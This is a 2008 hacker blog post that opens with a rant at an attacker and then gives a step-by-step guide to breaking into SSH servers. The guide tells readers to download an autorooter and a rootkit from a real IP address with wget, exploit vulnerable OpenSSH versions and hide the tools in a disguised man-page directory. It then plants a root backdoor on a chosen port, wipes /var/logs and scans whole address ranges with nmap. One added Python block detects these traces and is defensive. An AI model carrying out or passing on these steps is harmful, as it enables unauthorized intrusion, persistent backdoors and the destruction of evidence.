Friday, January 11, 2008

Bug Attack!

Hiya everyone, I just wana inform that tha person who attacked me with a bug this morning, ur not doing tha right thing dude. I know ur an intelligent hacker who has extensive knowledge in breaking firewalls but I just wana ask what u wana prove by sending me a bug. I don’t have any grudge against anyone and am not competing with any hacker so pliz try not to act in a negative way towards me coz I don’t have a habit of creating unnecessary enemies. And yeah, tha bug which u sent me will be fixed by tha http://java.sun.com and if u send me another bug I already have sources to fix that too. If ur from orkut I just wana say ur just proving yourself to be tha greatest loser coz there’s always a way for solving things like this... And beware of me coz i only forgive people's mistake once...

Cheers,

SSH Hacking!

SSH Scanning and Hacking
First, we need some tools
secureCRT (https://secure.vandyke.com/vandyke-bin/download_form.cgi?PRODUCT=SecureCRT_beta)
A SSH Client to connect to an SSH box.. With this
version u can SSH with a proxy

LNX r00tkit (http://81.86.153.92/dd/lnx.gz)
a rootkit, best there is i think.. Very easy to use..
Only needed in last step

X6 (http://81.86.153.92/dd/x6.tgz)
The Autorooter..

First, you gotta have a scan with vulnerable ips (or just
one )
WATCH OUT FOR SSH-1.99 OPENSSH 2.1.1 !! VERY VULNERABLE
Almost always works for exploiting..

Lets say we got an IP, 0.0.0.0, and a shell..
Connect to your shell and type :
wget http://81.86.153.92/dd/x6.tgz
it downloads the autorooter to the shell..
When its done, Type : tar xzvf x6.tgz
Then type cd x6
When in the dir, type : ./x6 -t#
it shows u all the Exploitable SSH Versions.. Lets say we got an
exploitable SSH-1.99-OpenSSH-2.1.1 (target 123 on the list)
The Ip = 0.0.0.0
you type :
./x6 -t123 0.0.0.0
Now it says something like : ATTACH NOW..
Wait 6 Seconds then push Enter.. Normally it starts
exploiting, it says like
1. 0x0000000 . . [SEGV]
2. 0x00000c4 . . [SURVIVED]
Something like that..

Just let it go and it will exploit your box..
If it doesn't go to 1. ..., and it says FATAL: no
it's not vulnerable

Then, when it exploited the box, u get some thing like :
no crash been found
Rem from Remote : CHRIS CHRIS

*** YOU ARE IN ***
Boxname
Boxhost blahblah

then type the following
cd /usr/man/man3/
and then :
mkdir ". hiden"
and then :
cd "..."
This is an hidden dir so the Sysop wont notice
Now we r going to download the Rootkit
type :
wget http://81.86.153.92/dd/lnx.gz
It will start downloading..
When done, type : tar xzvf lnx.gz
and then:
cd lnx
Then, we r going to start it..
Lets say u want password "poop" on port 25374
then u type :
./own poop 25374

It Installs the Rootkit, and Done !! Connect to the ip
with port 25374 (or the one u too
Username = root
and u gave the password urself..

now CLEANIN (for no traces):

rm -rf /var/logs/*
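
Seen from the defender's side, the walkthrough above leaves two host artifacts: a directory with a disguised name inside the man-page tree, and a log directory with nothing visible left in it. The block below is an added example (not part of the original post) that checks for both; the function names and the sample tree are constructed for illustration.

```python
import os
import tempfile

def suspicious_dirs(man_root):
    """Directories under a man-page tree whose names are meant to be overlooked."""
    hits = []
    for dirpath, dirnames, _files in os.walk(man_root):
        for name in dirnames:
            dotted = name.startswith(".")              # hidden from a plain `ls`; "..." mimics ".."
            spaced = any(c.isspace() for c in name)    # ". hiden", trailing blanks
            if dotted or spaced:
                full = os.path.join(dirpath, name)
                hits.append(os.path.relpath(full, man_root))
    return sorted(hits)

def log_dir_wiped(log_dir):
    """True when a log directory exists but holds no visible entries.

    A shell glob such as `rm -rf dir/*` skips dotfiles, so they are ignored here.
    """
    if not os.path.isdir(log_dir):
        return False
    return not any(not e.startswith(".") for e in os.listdir(log_dir))

def build_sample(root):
    """Constructed sample: a man tree with two planted names and an emptied log dir."""
    man3 = os.path.join(root, "man", "man3")
    for planted in ("...", ". hiden"):
        os.makedirs(os.path.join(man3, planted, "lnx"))
    os.makedirs(os.path.join(root, "man", "man1"))
    logs = os.path.join(root, "log")
    os.makedirs(logs)
    open(os.path.join(logs, ".keep"), "w").close()     # dotfile survives a `*` glob
    return os.path.join(root, "man"), logs

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        man_root, logs = build_sample(tmp)
        for path in suspicious_dirs(man_root):
            print("disguised directory:", repr(path))
        print("log directory wiped:", log_dir_wiped(logs))
```

On a real host, point `suspicious_dirs` at each man-page root and `log_dir_wiped` at the system log directory; a running system with an empty log directory warrants a closer look.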

SSH scan TUTORIAL
USE nmap

http://www.insecure.org/nmap/nmap_download.html


syntax
for SSH scanz

nmap -O -sS -p 20-23,80,443 '194.65.*.*' > FILE.OUTPUT

-O means guess remote OS
-sS tcp syn stealth
-p ports to scan (WE include ftp telnet and ssh and HTTP and secure http)
and finally the nets '194.65.*.*' it will scan from 194.65.1.1
to 194.65.254.254

have PHUnz

Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-T General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG Output normal/XML/grepable scan logs to
-iL Get targets from file; Use '-' for stdin
* -S /-e Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES

Protecting your box to rehackers (IMPORTANT !!)


Before scanin or haxin i would recommend to change thiz vars.

its very easy

works on all linux versions..


just make a shell script with vi ::

#!/bin/sh
####
echo Protectin ur Env to a safe hax W0rk
echo LOL.dDwAx
####
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
echo 1 > /proc/sys/net/ipv4/conf/default/hidden
echo 1 > /proc/sys/net/ipv4/conf/default/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/default/forwarding
echo 1 > /proc/sys/net/ipv4/conf/default/log_martians
echo 1 > /proc/sys/net/ipv4/conf/default/rp_filter
echo 1 > /proc/sys/net/ipv4/conf/eth0/hidden
echo 1 > /proc/sys/net/ipv4/conf/eth0/proxy_arp
echo 1 > /proc/sys/net/ipv4/conf/eth0/forwarding
echo 1 > /proc/sys/net/ipv4/conf/eth0/log_martians
echo 1 > /proc/sys/net/ipv4/conf/eth0/rp_filter
####
echo Done
echo now use ur nmap or ur exploits and have phunz
####